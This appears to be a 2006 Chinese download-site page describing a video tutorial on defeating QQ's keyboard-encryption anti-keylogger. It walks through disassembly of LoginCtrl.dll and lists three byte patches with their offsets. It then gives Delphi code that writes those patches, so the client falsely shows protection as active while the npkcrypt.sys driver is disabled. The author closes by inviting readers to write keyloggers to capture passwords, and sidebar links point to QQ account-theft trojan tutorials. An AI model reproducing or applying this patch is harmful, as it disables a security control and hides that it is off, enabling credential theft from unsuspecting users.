|
| 运行环境: Win9x/NT/2000/XP/2003 | |
| 软件语言: 简体中文 | |
| 授权方式: 免费版 | |
| 软件属性: 热 荐 | |
| 解压密码: www.05112.org | |
| 添加时间: 2006-7-29 10:20:28 | |
| 下载次数:总计: |
| ::软件简介:: |  |
很高兴大家看这个没有什么技术的动画,高手们忙中有闲路过也行,呵呵!!开玩笑,好进入主题:
一、现在网上有很多盗QQ木马软件,它是如何工作的呢,能够绕过QQ健盘加密,从而进行窃取密码的非法勾当。
1、网上有文章讲,删除QQ目录下的npkcrypt.sys文件就可以绕过健盘加密方法,但这种方法很明显,会出现QQ健盘加密技术的失败。(我们试下出现的效果)我们做下 我们看到的效果
2、今天我要讲的方法,不删除npkcrypt.sys文件,只修改QQ目录下的LoginCtrl.dll文件,就可以了。我们先复制一份
二、开始
测试环境:winxp sp2 qq2006beta2版本
准备工具:任何一款反汇编软件,我这里用OllyICE,网上搜索有下。
winhex十六进制工具
1)为了方便测试,我们先把npkcrypt.sys文件删了。大家看到没有,出现QQ健盘加密启动失败。嗯,我们不管它,关闭QQ。
2)运行OllyICE文件,并打开LoginCtrl.dll这个文件,再右击-》查找-》当前模块中的名称(标签)。
3)找到npkcntc.#1导入函数,只要选择第一个就行了,然后按回车键,来到这里,再回车,来到这里,代码如下:
60A3F9A8 . 8BCE mov ecx, esi
60A3F9AA . E8 49050000 call 60A3FEF8 //检测npkcrypt.sys文件是否存在
60A3F9AF . 85C0 test eax, eax
60A3F9B1 74 0C je short 60A3F9BF //关健点,改为jne,意思是npkcrypt.sys文件不存在
60A3F9B3 . |FF15 E466A460 call [<&npkcntc.#1>]
60A3F9B9 . |8986 90010000 mov [esi+190], eax
60A3F9BF > \39BE 90010000 cmp [esi+190], edi
60A3F9C5 . 0F8E 88000000 jle 60A3FA53
60A3F9CB . |68 9E0B0000 push 0B9E //0B9E资源为显示鍵盘加密成功的字符。
60A3F9D0 . |8D8E 94010000 lea ecx, [esi+194]
60A3F9D6 . |E8 5D1A0000 call <jmp.&MFC42.#4160>
60A3F9DB . |E8 BE1A0000 call <jmp.&MFC42.#1168>
60A3F9E0 . |8B40 0C mov eax, [eax+C]
60A3F9E3 . |57 push edi
60A3F9E4 . |6A 0C push 0C
60A3F9E6 . |6A 0C push 0C
60A3F9E8 . |6A 01 push 1
60A3F9EA . |68 C13E0000 push 3EC1 注意这里的3EC1,加密正确显示的资源名,非常重要
60A3F9EF . |50 push eax
60A3F9F0 . |FF15 7C66A460 call [<&USER32.LoadImageA>]
60A3F9F6 . |8D7E 64 lea edi, [esi+64] //健盘加密技术启运成功显示的图像
60A3F9F9 . |6A 00 push 0
60A3F9FB . |8BCF mov ecx, edi
60A3F9FD . |8986 88010000 mov [esi+188], eax
60A3FA03 . |E8 11FAFFFF call 60A3F419
60A3FA08 . |FF15 F066A460 call [<&npkcntc.#9>]
60A3FA0E . |85C0 test eax, eax
60A3FA10 . |75 08 jnz short 60A3FA1A
60A3FA12 . |6A 01 push 1
60A3FA14 . |FF15 E066A460 call [<&npkcntc.#4>]
60A3FA1A > |85FF test edi, edi
60A3FA1C . |75 04 jnz short 60A3FA22
60A3FA1E . |33C0 xor eax, eax
60A3FA20 . |EB 03 jmp short 60A3FA25
60A3FA22 > |8B47 20 mov eax, [edi+20]
60A3FA25 > |68 46080000 push 846
60A3FA2A . |50 push eax
60A3FA2B . |FFB6 90010000 push dword ptr [esi+190]
60A3FA31 . |FF15 EC66A460 call [<&npkcntc.#5>]
60A3FA37 . |85FF test edi, edi
60A3FA39 . |75 04 jnz short 60A3FA3F
60A3FA3B . |33C0 xor eax, eax
60A3FA3D . |EB 03 jmp short 60A3FA42
60A3FA3F > |8B47 20 mov eax, [edi+20]
60A3FA42 > |6A 02 push 2
60A3FA44 . |50 push eax
60A3FA45 . |FFB6 90010000 push dword ptr [esi+190]
60A3FA4B . |FF15 E866A460 call [<&npkcntc.#10>]
60A3FA51 . |EB 43 jmp short 60A3FA96
60A3FA53 > \FF15 9460A460 call [<&KERNEL32.GetLastError>] npkcrypt.sys文件不存在,跳到这里
60A3FA59 . E8 401A0000 call <jmp.&MFC42.#1168>
60A3FA5E . 8B40 0C mov eax, [eax+C]
60A3FA61 . 57 push edi
60A3FA62 . 6A 0C push 0C
60A3FA64 . 6A 0C push 0C
60A3FA66 . 6A 01 push 1
60A3FA68 . 68 C23E0000 push 3EC2 改 注意这里是3ec2,错误的资源名,改成正确的资源名为3ec1
60A3FA6D . 50 push eax
60A3FA6E . FF15 7C66A460 call [<&USER32.LoadImageA>]
60A3FA74 . 8D7E 64 lea edi, [esi+64]
60A3FA77 . 6A 01 push 1
60A3FA79 . 8BCF mov ecx, edi
60A3FA7B . 8986 88010000 mov [esi+188], eax
60A3FA81 . E8 93F9FFFF call 60A3F419
60A3FA86 . 68 9F0B0000 push 0B9F 改 这里是0B9F,显示健盘加密失败的字符资源,前面为0b9e,改成0b9e
60A3FA8B . 8D8E 94010000 lea ecx, [esi+194]
60A3FA91 . E8 A2190000 call <jmp.&MFC42.#4160>
60A3FA96 > E8 031A0000 call <jmp.&MFC42.#1168>
60A3FA9B . 8B40 0C mov eax, [eax+C]
60A3FA9E . 6A 00 push 0
60A3FAA0 . 6A 10 push 10
60A3FAA2 . 6A 10 push 10
60A3FAA4 . 6A 01 push 1
60A3FAA6 . 68 C33E0000 push 3EC3
60A3FAAB . 50 push eax
60A3FAAC . FF15 7C66A460 call [<&USER32.LoadImageA>]
全部保存,再运行下QQ
哈哈,大家看见没有,npkcrypt.sys文件被删除,显示加载健盘加密技术启运成功。所以我们不要删除这个文件,现在我们把这个文件还原回去,再运行看看效果如何,事实上这个文件已没有用了,只要改下LoginCtrl.dll文件的三处就可以了,分别为:
60A3F9B1 74 0C je short 60A3F9BF //关健点,改为jne,意思是文件不存在
60A3FA68 . 68 C23E0000 push 3EC2 注意这里是3ec2,错误的资源名,改成正确的资源名为3ec1
60A3FA86 . 68 9F0B0000 push 0B9F //这里是0B9F,显示健盘加密失败的字符资源,前面为0b9e,改成0b9e
就行了。我们现在改回去,又出现鍵盘加密失败的信息。
4)使用winhex定位编程修改位置,从而进行修改。打开源LoginCtrl.dll
运行winhex->文件-》打开-》选择LoginCtrl.dll文件,再点搜索-》查找十六进制数据
第一处:查找:FF15E466A460为了好定位,往前找74 看下面的程序任务栏的偏移量为f9b1,改为75就可以了
第二处:查找:68C23E0000 找到第二个地方 找到c2,看下面程序任务栏的偏移量为fa69,改为c1就可以了。
第三处:查找:689F0B0000 找到9f,看下面的程序任务栏的偏移量为fa87,改为9e就可以了。
最后保存,又出现健盘加密成功了。
5)有了上面的偏移量我们现在来编程实现,这里给出DELPHI修改LoginCtrl.dll的源码。
function Button3Click(sss:string):boolean;
var
buffer:char;
F:file;
begin
result:=true;
try
Assignfile(F,sss+'LoginCtrl.dll');//关联QQ目录下的LoginCtrl.dll文件
FileMode:=2;
Reset(F,1);
Seek(F,f9b1);//把文件指针定位到63921这里,改为75
buffer:=char($75);
Blockwrite(F,buffer,1);//
Seek(F,fa69);;//把文件指针定位到64105这里,改为c1
buffer:=char($C1);
Blockwrite(F,buffer,1);
Seek(F,fa87);//把文件指针定位到64135这里,改为9e
buffer:=char($9E);
Blockwrite(F,buffer,1);
Closefile(f); //最后关闭文件。
except
result:=false;
end;
end;
最后教程结束了,这时各位可以写过鍵盘记录密码东东了,可以截取密码,也不知道大家看懂没有,第一次做动画,失误之处,敬请各位原谅,还希望各位努力学习。
注意: 其它版本的QQ,需要用这方法重新定位修改,
修改时要关闭QQ程序。
最后声明:只学习而已,非其它目的,严禁用于此方法用于非法目的!!!
谢谢收看!!!
| 免费点亮wap手机标志 | 10-05 |
| 如何使用黑客qq皮肤 | 10-04 |
| 刷钻教程(附花刺工具) | 10-01 |
| 另类获取QQ情侣号(正规途径) | 10-01 |
| 揭穿QQ永久会员的秘密 | 09-27 |
| 老猫QQ大盗2008实战盗Q和防盗Q专 | 09-23 |
| 不用支付密码刷会员+6钻 | 09-22 |
| 刷7钻和会员 | 09-16 |
| 浙江刷会员+6钻 | 09-13 |
| 如何找回误删QQ好友 | 09-13 |
| QQ木马配置和收信 | 09-13 |
| 2分钟点亮CF | 09-10 |
| 免费点亮wap手机标志 | 10-05 |
| 刷钻教程(附花刺工具) | 10-01 |
| 另类获取QQ情侣号(正规途径) | 10-01 |
| 老猫QQ大盗2008实战盗Q和防盗Q专 | 09-23 |
| QQ邮箱跨站漏洞 | 09-10 |
| 免费开通WAPQQ | 09-10 |
| QQ普通号码变靓号 | 09-10 |
| 简单盗QQ轻松盗网游(语音) | 09-06 |
| 利用工具继续刷浙江钻石 | 09-02 |
| 揭穿刷永久QQ业务+QB教程 | 09-02 |
您现在的位置: